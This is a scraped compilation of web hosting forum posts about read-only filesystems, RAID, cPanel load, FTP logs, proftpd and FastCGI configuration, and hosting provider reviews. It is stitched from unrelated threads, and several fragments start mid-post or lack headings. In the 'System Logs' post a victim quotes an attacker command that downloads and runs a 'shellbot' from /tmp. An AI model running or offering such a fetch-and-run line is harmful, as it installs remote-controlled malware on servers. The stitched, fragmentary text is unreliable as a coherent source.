Server Became Read Only System

I had a linux server (CentOs 5, mysql5, php5, directadmin). I had problems with apache few days ago, that's why i hire sys. admin who tweak the system (install the PAE kernel), and some more configurations, and during last 7-8 days server work w/o any downtime (before this server had 1-2 downtimes per day-> OOM killer.)

Now i had only ssh access (emails, directadmin access - give "wrong password" answer). As told my sys.admin It became read only system.

I cann't even reboot system

Quote:

[root@server sa]# reboot
reboot: /usr/local/lib/libpng12.so.0: no version information available (required by /usr/lib/libcairo.so.2)

such few commands work, the most commands that i know don't work

Quote:

[root@server ~]# ls -la
ls: error while loading shared libraries: libacl.so.1: cannot open shared object file: No such file or directory

Read-only System 3rd Time
I have brand new server with CentOS 5.3 and latest CentOS kernel (2.6.18-128.1.10.el5PAE).

I have brand new HDDs with no errors (HDDs have only 1000 power-on-hours, server CPU temperature is normal - between 35-42 C). My server went read-only without any reason. I need to fsck main / partition (/home is separated) and it cleaned journal, then server became online.

After 2 weeks it happens again - I did again fsck on / partition and it recovered journal as before. I decided to ask Data Center to replace RAID-1 card and memory - they did it. After 3 weeks server went read-only again.

I ssh into server and saw that kswapd0 process is using 100% cpu and load is over 170.

After fsck it recovered journal on / and server is again available.

How To Change Permissions Of A Read Only File System
I have a dedicated server and till few days back i was able to edit my files fine but this morning when i am trying to edit any file, it gives me back this error:

[user@domainname theme]$ chmod 777 header.php
chmod: changing permissions of `header.php': Read-only file system
[user@domainname theme]$

[root@domainname theme]$ chmod 777 directoryy
chmod: changing permissions of `directoryy': Read-only file system
[root@domainname theme]$

I tried both as normal user and root and same results. Do you think the hosting guys changed the permissions of the file system or something?

This is the server I'm thinking of getting -

I have heard from a lot of people that Freebsd is good for hosting but just wondering what your views are

Why Is RAID 1, Just Use A Backup System/server
I haven't yet broken into the realms of dedicateds, although I have a decent VPS and am anticipating the need to get a dedi in the future.

Hence I'm wondering briefly why exactly RAID (insert some random number?) is recommended? I know it does something to do preventing hard drive failure, although would an efficient backup system be a decent alternative with regards to cost?

System To Control Server Load On Cpanel
a good method to have processes controlled in the resources they use, in a shared cpanel environment?

For example, it appears that the cpanel backup (compressed) made the load skyrocket to beyond 60% cpu and 95% memory usage today, and this server is beefy to begin with.

I want some system to kill processes immediately if they exceed X amount of resources or kill processes that spiral out of control (X amount of processes from same user).

I'd like to be alerted of this action as well.

How can I set this up?

New Domain Name, How To Point It To My Server 2003 System
I have always been using a no-ips service for a domain name. It was really easy with the dynamic update client because I have a dynamic ip.

I have just registered a domain and would like to point that to my server also. My registrar says it is currently parked, there doesn't seem to be an option to unpark it anywhere. I have also changed the nameserver to my no-ip domain name.
Nothing is happening.

I have also googled dns.. If I want to point my domain directly to my server do I need to go and install Active Directory and then dns or can I just install DNS, do I even need to do this??

Seems like a lot of hassle tbh, this is really frustrating me because i'm pretty tech savvy but am completely lost here..

Read Only Filesystem
I have a server with pacificrack. When I see my website it says "Read-Only File system" and my SSH dies with read-only file system errors.

It happens once per month, and the bad thing is I'm sleeping when it happens so I don't know my server is in this state.

Even though support fixes the problem within 15minutes of my support ticket, my server is down for hours because I don't know its down to then raise a ticket. I asked support why it happens and they never tell me... just tell me to read the logs but I'm not technical enough to understand linux logs etc.

Server is centos.

To Read Ftp Log
We have been working on a site for a while, couple of days ago I copied the source from the server - as there are few people making the changes to it - to get a fresh copy.

Yesterday I was blasted by my client that I have deleted files on the server and it had caused the site to go in disarray and they had to upload everything again.

I didn't delete anything, only copied, and after some arguments (naturally I am not happy with the allegation put on me) I was able to get the FTP log, but I don't really know how to read it, I am hoping that someone here would know and be able to assist:

HTML4Strict Code:
Tue Mar 04 16:49:29 2008 0 xx.xx.xx.xx 9365 /home/APP_NAME/public_html/user/add_room.php a _ i r xxxx ftp 1 * cTue Mar 04 18:20:02 2008 0 xx.xx.xx.xx 3909 /home/APP_NAME/public_html/About.php a _ o r xxxx ftp 1 * cTue Mar 04 18:20:04 2008 0 xx.xx.xx.xx 6046 /home/APP_NAME/public_html/affiliate-join.html a _ o r xxxx ftp 1 * cTue Mar 04 18:20:08 2008 0 xx.xx.xx.xx 6158 /home/APP_NAME/public_html/affiliate-join.php a _ o r xxxx ftp 1 * c

I have replaced the IP, application name with x.

I am guessing that *c means copy, but I don't want to make fool of myself when I confront them with this. Assuming that *c is copy what would be the command for delete?

Read The Cpanel Log
I received email from my cpanel server as follow:

IMPORTANT: Do not ignore this email.

This is cPanel stats runner on server.domain.com! While processing the log files for user xxxx, the cpu has been maxed out for more than a 6 hour period. The current load/uptime line on the server at the time of this email is 18:46:25 up 59 days, 13:16, 0 users, load average: 2.24, 2.23, 2.25

You should check the server to see why the load is so high and take
steps to lower the load. If you want stats to continue to run even with a high load

So what does this mean? and how can i check out this? how to reduce the cpu usage? Where to see the current usage?

What Happens If You Forget To Read TOS
About a month ago, I searched desperately for days to host my social networking site and file hosting site. Thankfully I found Wiredtree(WT) to be suitable for my budget. I signed with them with their entry plan of $44.10 and was happy with their service. The customer support was extremely helpful and they did everything to make my life better.

Nevertheless my project didn't turn up as expected and I decided to close the hosting.

Just a day before the end of one month of hosting, I wrote to them asking to close the account and also congratulating their service I also told them I would look forward to host with them in future and would recommend them. I expected a warm termination without any hassle. But i got a mail quoting their TOS (which says I should inform them 7 days in advance) and asking me to pay up another month's hosting fee before I can close the account. Along with it was a note from the staff to use the client portal to contact Billing Department directly to close the account (hmmm would they ask me to contact sales department directly if I tell me I want to add new server?). What hurt me was not the extra $44.10 which I will pay them anyway, but what they could have done was to understand my genuine case(first time customer). Tell me, how many of us read the TOS really. I requested them not to charge me, but got same cold response asking me to adhere to the TOS.

On the other hand my experience with other host (PM me if you want to know who) was one of awe and amazement. I wrote asking them the price I should pay to have more bandwidth. To my surprise I got extra bandwidth absolutely free though it wasn't mentioned such things in their TOS.

Well I learned a lesson today not to forget the importance of TOS and i am sure new webmasters will find this post useful.

This thread is not against the WT service. But a warning to new webmasters who might miss the fine print.

Anyone Know How To Read Email Headers
I'd love to contact the domain registrars of the recipient spammers who are barraging me with the latest "google riches", or "ebay success" sales pitch emails, but I lack the knowledge of how to reveal the email headers and interpret them.

Is there a particular email client program that would allow me to view all parts of the email ? Maybe I'm using the wrong client (outlook), that would not allow me to view the more technical parts of the email, but but I don't know.

If I go ahead and click on their "unsub me" links at their bottom, that's their tricky way of finding out what emails are active and possibly make it worse for me. I know that it's illegal to send me email that I didn't opt into, in the first place, even if they do provide the unsubscribe link at the bottom, with the usual "Icann" spam disclaimer that they include.

Onboard Raid 1 (Read Only After Testing)
I have a server with 2 hard drives.

1. I configured the onboard Raid 1, both as Volume0

I installed CentOS successfully. So I tested the RAID to see if the mirror really works

2. I took out hddA and boot hddB as single drive. it work!

3. Then I took out hddB and boot hddA as single drive. it work!

4. Then I plug back hddA & hddB back together & boot it up

It gives me many error screen, I had to login as repair screen with root password. It says everything is read-only. So I try to remount but it fails

#e2fsck -y /dev/sda1
#mount -t ext2 -o rw,remount /dev/sda1 /
#mount -n -o remount ext2 /dev/sda1 /
#mount -o remount,rw /

None above works. I wonder if I am not suppose to do that way the first place?

</VirtualHost>

Scripts are running with user's UID, and that is fine, but it can still read /etc/passwd file for example.

How to fix that? Is it really open_basedir value is ignored by susphp? It works fine if I remove suphp and run scripts with nobody uid.

NYNOC Exit Review - Read Before Purchasing
As many of you may have already read my initial review or the New York NOC I wanted to leave an additional exit review of the company and share a personal recommendation.

It started a little over a month ago when I jumped VPS providers and initially purchase 2 VPS plans . Initially the boxes were rock solid. I could get to my websites, admin area, and have support tickets responded to in a timely manner. Roughly a week later I ended up moving another site to it’s own VPS . This is when I noticied my first issues. CONSTANT ERROR MESSAGES stating the backend was down and to please restart it.

I would launch a support ticket, roughly 2 hours later the backend would be rebooted and I could once again access the admin panel and do what I needed to. Like clockwork when I would try to login again later to my admin panel I would be hit again with the backend was down (hypervm would be in a constant refresh). Sometimes my sites would remain online and sometimes they would go down too. This got frustrating but was bearable (I thought). Within a few days I see a BIGGER problem arise. I woke up one morning to find error alerts coming in and realizing 2 VPS’s had been offline for hours on end. I again launch another support ticket for the backend to be rebooted. I get a response everything is ok so I go about my day. I later receive an e-mail stating all of my sites were showing a mysql connect error and panic. Come to find out they had corrupted this time when the backend went down, I repair and optimize and everything is ok. VERY next day I wake up and check my nightly logs to make sure the nightly backup was loaded onto my home server. I don’t see it and find I received an e-mail from lxadmin stating it could not backup the database. Once again…..corrupted. This has been going on since that time frame on almost a daily basis. The backups are iffy if they will come in since when the backend gets overloaded and crashes in the middle of the night, it immediately corrupts all db’s on the VPS. I could understand 1 VPS doing this…..but 3? Come on….

Now comes Thanksgiving, my boxes go down for roughly 5 hours before reboot and once again I have to repair them on a blackberry with ssh since I am away (never fun to type that on a bb). I am back online and go about my day…….then…..Friday. My box goes down at 5pm…..I send in a support ticket to have it rebooted. The next morning at 11am it finally gets turned back on and I get a response that it must have been on my end since everything looks ok from there (granted 3 monitoring services were all showing it down). Once again…..corrupted. I rebuild and think the SLA was 99.9% so I send in a nice message to ask about it. Here is the response:

Posted: 11/29/2008 12:33
Hey Guys.
Since one of the VPS accounts was down for 17 hours do I qualify for the 99.9% SLA?
(3 Monitoring Services show the outage happened at 5:34PM last night and I have recovery notifications for this morning at 11:16AM)
Thanks
----------------------------
IP Address: 71.76.239.xx Andy
StaffPosted: 11/30/2008 20:49 Hi Ryan,
Unfortunately our SLA applies to network uptime and not power or hardware related.
I'm sorry for the inconvenience.
-------------------------------
The New York NOC Inc.
www.thenynoc.com
Visit our new forums! [url]

So……99.9% SLA does not cover if no one is in the datacenter to reboot the box because it is off-line…..I thought SLA’s covered your box being on-line, am I wrong?

So now after too many corruptions to count, support taking longer and longer in between responses I am left looking over my books. Last year alone between Thanksgiving and the following Sunday I brought in roughly $2300 dollars in sales. This year for the past 4 days I have brought in $10…… I have had some longtime recurring customers so I asked them for any feedback on what we could do to earn there business again. Out of 40+ people all but one stated that if I could fix the sites downtime they would return (the other responses was of course to lower prices). Second suggestion they had was to fix my e-mails from ending up in their spam box. Yes I was sold ALL dirty ip’s which had all been blacklisted. Some major isp’s worked with me and allowed me in…(some)

Before I get flammed for choosing these guys, they truly were great up front so obviously I got fooled. I have no doubt they are great for some people but I simply can not drive my business into the ground because I went cheap and in the end got what I deserved. I moved to futurehost today and almost **** myself when a response ticket was answered in under a minute (kinda scary for a low priority ticket).

With this said, before you consider NewYorkNoc simply ask yourself if your business or site is important to you, if you can afford to lose business, and if you want constant downtime along with mysql corruptions daily. I am not saying they are the worst as they were helpful at first. Just EXPECT that when the deal is that good, you are being oversold. There is no other explanation in my books.

To sum this up:

Uptime: 3 out of 10 (there were up sometimes)
Customer Service: 2 out of 10 (would have given higher I did not have to repeatedly e-mail over the backend issues)
Price: 10 out of 10 (admit it, the price point these guys have is good)
Value: 1 out of 10 (I made a bad choice, I lost a ton of money in business and now have to work hard to recover my losses and rebuild relationships)
Recommend to others: 2 out of 10 (why 2? This place might be good for offsite backup maybe?)

This review is NOT out of spite due to my recent downtime. This review is merely my opinion and personal experiences and not written to bash NYNOC. If your happy with them then you are doing well. If you are considering them…….I urge you to think elsewhere. All my data is off the VPS and I am running before the backend crashes again corrupted my DB’s.

How To Read Remote Non-HTTP Text Files
I'm working on some PHP intranet tools. I'm still somewhat new to PHP, having come from an ASP background; been doing PHP for about a year now.

The tools used to be located on a Solaris box, which is running PHP 4.2. One of the tools checks text files in a particular location on the same box that are generated by another process. The text files are found and parsed by locating a particular directory and looking through the entries for filenames matching a particular pattern; they may or may not be present depending on the success of the other process. The text files and directory are not in a web-servable location (i.e. they can't be reached via HTTP or FTP).

I am now able to migrate to a new Windows 2k3 server running IIS 6. I've configured it with PHP 5.2.5 and it is successfully serving web pages. I need to migrate these tools over to the new server but they still need to reach the text files on the old server. The old server has a Samba share hooked to the directory I need and I can successfully map it as a mapped drive from the Win2k3 box.

It's my understanding (after hours of googling and testing) that mapped drives are specific to the logged-in user and not to the machine in general, so IIS can't see them (which seems to be validated by my tests). I've pulled in the mapped drive to the Samba share as a virtual directory under IIS but PHP scripts still can't see it. The share is not available under FTP or HTTP, so cURL doesn't seem to be an appropriate solution, as far as I can tell. It's also my understanding that mapped drives aren't dependably re-mapped after a server reboot until the user logs in, and of course there won't necessarily be users logging into the server to create the mapped drives after a reboot. So mapped drives seem to not be a solution either.

One person from another forum (not SitePoint) suggested running the IIS process under the domain login credentials used to get to the Samba share, and find a way to map the drive automatically after a reboot (some sort of Windows service that would call a batch file or something). I'm not comfortable using a domain login to run my IIS under (although I tried it and it didn't seem to work for a previously-mapped drive).

So my question is: is there a way from PHP to connect to a remote Samba share, provide inline credentials, and use functions like is_dir and file_get_contents on files in that share? I'm not a PHP guru yet, but I've successfully set up the server, create and use remote MySQL databases, write my own JavaScript and Ajax, and don't consider myself to be a newbie - and I simply can't find a good solution for this problem. I come from an all-Microsoft background where integrated authentication was the intranet standard and issues like this simply didn't come up.

I hope this is the appropriate forum to ask...the server forum was the second runner-up but after looking at threads there they didn't seem to address issues like this.

[Wed May 21 12:01:29 2008] [error] [client 1.2.3.4] FastCGI: incomplete headers (0 bytes) received from server "/usr/local/apache2/htdocs/user/php-wrapper"
As you can see this unfortunately does not tell me anything.

Now viewing the apache error_log I see this

Code:
[Wed May 21 12:51:11 2008] [warn] FastCGI: scheduled the restart of the last (dynamic) server "/usr/local/apache2/htdocs/user/php-wrapper" process: reached dynamicMaxClassProcs (10)
[Wed May 21 12:51:11 2008] [warn] FastCGI: (dynamic) server "/usr/local/apache2/htdocs/user/php-wrapper" (uid 514, gid 515) restarted (pid 20510)
[Wed May 21 12:52:00 2008] [warn] FastCGI: (dynamic) server "/usr/local/apache2/htdocs/user/php-wrapper" (pid 20510) termination signaled
[Wed May 21 12:52:00 2008] [warn] FastCGI: (dynamic) server "/usr/local/apache2/htdocs/user/php-wrapper" (pid 20510) terminated by calling exit with status '0'
[Wed May 21 12:57:02 2008] [warn] FastCGI: (dynamic) server "/usr/local/apache2/htdocs/user/php-wrapper" (pid 20501) termination signaled
[Wed May 21 12:57:02 2008] [warn] FastCGI: (dynamic) server "/usr/local/apache2/htdocs/user/php-wrapper" (pid 20501) terminated by calling exit with status '0'
[Wed May 21 13:02:03 2008] [warn] FastCGI: (dynamic) server "/usr/local/apache2/htdocs/user/php-wrapper" (pid 20491) termination signaled
[Wed May 21 13:02:03 2008] [warn] FastCGI: (dynamic) server "/usr/local/apache2/htdocs/user/php-wrapper" (pid 20491) terminated by calling exit with status '0'
All warnings so I'm assuming these don't mean anything.

Here's the php-wrapper:

Code:
#!/bin/sh
PHPRC=/usr/local/lib
export PHPRC
PHP_FCGI_CHILDREN=8
export PHP_FCGI_CHILDREN
PHP_FCGI_MAX_REQUESTS=500
export PHP_FCGI_MAX_REQUESTS
exec /usr/local/bin/php-cgi

Not a particularly well setup system for users and such but it worked for the user.

The software versions are as follows:

Apache 2.2.8 with Suexec on the FCGI
FastCGI (Latest stable and also tried a CVS version)
PHP 5.2.6
64 bit system

how to go about debugging this?

What Kind Of Harddrive Read And Writes Speeds Should Be Expected
I have a windows 2003 VPS and I'm not satisfied with the HD I/O speed, and before I mention what speeds I am getting I just want to see what people say should be plausible. I want to know if I am thinking I should get more out of the VPS then I really should.

Anyway, I used this program from ATTO to benchmark:
short-media.com/download.php?d=108
Called ATTO Disk Benchmark

If anyone is willing, run it on your VPS and post a screenshot. It's a standalone .exe, no install needed.

SiteManaged.com - 100% Reccomended Web Host, Read My Review!
I've been registered on here for about 4 years now, and in this time I have had 4 different web hosts. I've had a total is 7 hosts since I launched my first website back in 1999. I host 7-8 websites, and a few recieve substantial traffic due to them being "official" websites for music artists (one multi-platinum selling musician). In 2007, I found a fantastic hosting company based in the US, who were charging me a LOT of money each month for a Managed Dedicated server. However, last Xmas I decided to seek a cheaper alternative but with the same service, and I thankfully found it at;

www.sitemanaged.com

Now, I dont know if I should post this, just remove the thread if so. But since moving to SiteManaged.com in January 09, I am saving over half of the money I was spending with my previous host.... and the support is even better. Yesterday they kindly and swiftly fixed something on my actual website within 24 hours, that was an error caused by me. I have had 100% uptime, and the server speeds are the best I have ever had.

Total quality. I'll never look elsewhere to host my sites.

Proftpd Config - How To Make Directory Have Read/write Access
Followed the guide over at [url]to get proftpd setup.

It only lists ways to create a single upload directory and a single download directory.

Tried all possible ways to get a directory creating allowing read/write but so far unsuccessful.

how this can be acheived?

Here is my current config.

#start of config

<Directory /home/FTP-shared>
Umask 022 022
AllowOverwrite off
<Limit MKD STOR DELE XMKD RNRF RNTO RMD XRMD>
DenyAll
</Limit>
</Directory>

<Directory /home/FTP-shared/download/*>
Umask 022 022
AllowOverwrite off
<Limit MKD STOR DELE XMKD RNEF RNTO RMD XRMD>
DenyAll
</Limit>
</Directory>

<Directory> /home/FTP-shared/upload/>
Umask 022 022
AllowOverwrite on
<Limit READ RMD DELE>
DenyAll
</Limit>

<Limit STOR CWD MKD>
AllowAll
</Limit>
</Directory>

#end of config

/home/FTP-shared/read-write is the folder I want to be able to read and write data to.

Setting Directory Read/write Permissions With WAMP And IIS
I'm using WAMP and IIS for the first time so bear with me if I overlooked something obvious.

I have a simple script that creates a few files and then attempts to move them to a subdirectory. I am getting a permission denied error when attempting to move the scripts in WAMP. I am uncertain how to set directory permissions in WAMP. I am also unsure how this will affect the script when I migrate it to an IIS server.

Stay Away From Lunar Pages !! Why? Read My Letter To Them (VPS Hosting Package $40 )
This is the letter I've faxed 7 days ago(May 12, 2009) and NO RESPONSE!
------------------------------------------------------------

Open letter to Lunar Pages (Add2Net),

Hello Lunar Pages (Add2Net), I’m writing this letter in order to let you how unsatisfied we are with your service. We have opened account on March 28 2009 and still we are not able to work out with your Staff to make our website work today is May 12, 2009.

First we have ordered the VPS(windows) hosting with SQL server database and it took 3 times for your administrators to understand that we need a Windows hosting NOT Linux. It’s obvious if you use Sql Server you’ll need to use Windows server with ASPNet technology Right? Not for your staff.

Secondly we have provided the database but don’t have any reasonable rights at your servers so we have to wait for days for your untrained administrators to do some work for us. I understand the security procedures you should understand US, we have business to run which is waiting for days.

Let me explain this problem in more detail and tell you OUR “database story” from the beginning:

We have provided the files then your staff installed that on some separated server from our hosting, than re-installed that on our VPS server than they have returned that to that separate server (round trip yes it is). After that we have asked them to update our database, they said OK. We have provided the files from SQL 2008, than member of your staff said

“Unfortunately, we do not support SQL Server 2008 on VPS plans, nor the 2005 version due to the high amounts of system resources they consume. However, we can create a database for you on a remote MS SQL 2005 server where you are allowed 1 G of database / 300 MB log. The IP of your VPS would be white listed and you would be allowed to connect to the database only from the VPS's IP.”

Help Desk No: 13

Response by M. M. (hidden for privacy reasons initials are correct)

Ok than I spent 2-3 days in converting the database. When I’ve uploaded the files your Senior Windows Admin R. D. (hidden for privacy reasons initials are correct)was unable to attach our database because our file was too big?? And he asked me to cut the file of 380MB in parts. Does he knows how long it would take me to do that and to make everything to work … maybe 3 months? So I had to do His job and do research online what he could do too but he didn’t. So I made the script for him which I’ve also tested and send that to him with an explanation (digested so 2 year old kid could understand not a Senior Admin). But, Mr. R
R. D. didn’t. So I have to make few calls to get in touch with him and to explain to him what he should do. So finally he did it on Apr 29 2009 and it worked like charm. But, this is not the end … our “hell story” it is just the middle of the story. Since than Apr 29 2009 I was in constant contact with Mr. D.(hidden for privacy reasons initials are correct) asking him to make some corrections to OUR ONLY database so our website could work properly as ANY other ASPNET website. I also tried to apply changes myself but I don’t have enough permission so my hands are tied. So finally I’ve got in touch with him over the phone after 3 days of trying (nobody ever answered the phone with his extension "3...") but the phone call was disconnected and I was unable to reach him again. He responded: “I am sorry that our phone call was cut short. It appears that the connection between my location and the main office was interrupted.

As I was trying to explain on the phone THe permissions that you are requesting are not capable to work on this environment. There are two reason as explained to me by the admin who has setup the SQL Service for VPS customers. First reason is this will prevent the possibility of SQL Injections as a security precaution. The second reason is related to overall usage on the server. This will prevent any one customer running away with the available resources on the server. With these two factors in place the permissions that you have requested are not available at this time Unless you upgrade to a dedicated server.”

The problem is that we have ran our website with 2 previous hosting companies websol.us (it’s still running there because we weren’t able to switch to Lunar yet)and viux.com on shared web servers with smaller packages than we are having with you (VPS), and had no problems and hadn’t been asked to run this on dedicated servers. This company is small and website is small too believe it or not. I’ve been worked on a lot bigger projects and never had problems like this.

My question is: (the same I’ve posted on Friday May 08, 2009 at 11:24 PM …and no answer yet):

Can you please help us and contact the only educated person there Mr.A. K. (who is our last hope) and ask him if he could give the right permissions for our ASPNET user there so our website could function normally? Can you pleas ask him if he could be of immediate assistance for us if ask for help in next few days do we can finally have our website working properly.

If not I’ll have to ask for a full refund and cover of expenses for our "lost time".
------------------------------------------------------------

So maybe our friends at LP will respond now!

p.s. I'll be very happy to confirm our domain name so WHT "WE" exist as customers of LP.

Any 'easy' Smtp / Pop / Imap Package Or Installer W/o Having To Read Up On Exim Etc.?
any 'easy' smtp / pop / imap package or installer w/o having to read up on exim etc.?

I want an email server quickly, w/o having to become an expert...

I'd go w/ a hosted service, but I open allot of pop3 connections... (program I use downloads one email, closes connection, reopens... repeat)...

There's lots of cookbooks out there, but they require quite a bit more time commitment (and configurability) than I want / need.

Is there any dumbified installs available? I tried with webmin, but even that wants me to manually configure a postfix / imap server bridge.=

Anytime I restart Apache, it loads quick for a few seconds then gets slow again...

Here are the top few processes listed on the process manager: .....

KVM Over IP System
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.

I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.

So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?

System Logs
I keep receiving hacking attempts from someone accessing my server and running commands like these:

Code:
hubberfix

sh -c cd /tmp;lwp-download [url]
shellbot

I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.

Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.

Which Operating System
There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A light weight OS is probably preferred but I really have no idea. And incase it helps, the servers have 512mb of ram, about 30 - 40GB of hDD (not actually sure) and an old AMD Duron.

CentOS
Debian
Direct Admin
Fedora
FreeBSD
Gentoo LiveCD
Redhat
Slackware

I just spent over 10 hours on my node configuration (debian etch). I have installed a lot of stuff, made raid1 array, control panel, some tools, rules etc etc etc.

I dont want to see that some day something crash - and I will must start over with everything.

What you guys suggest as backup method, maybe some how-to backup WHOLE system with all files, raid configuration etc.

I dont need incremental backups at all - I just want to save/backup current system, and maybe restore if something bad would happen.
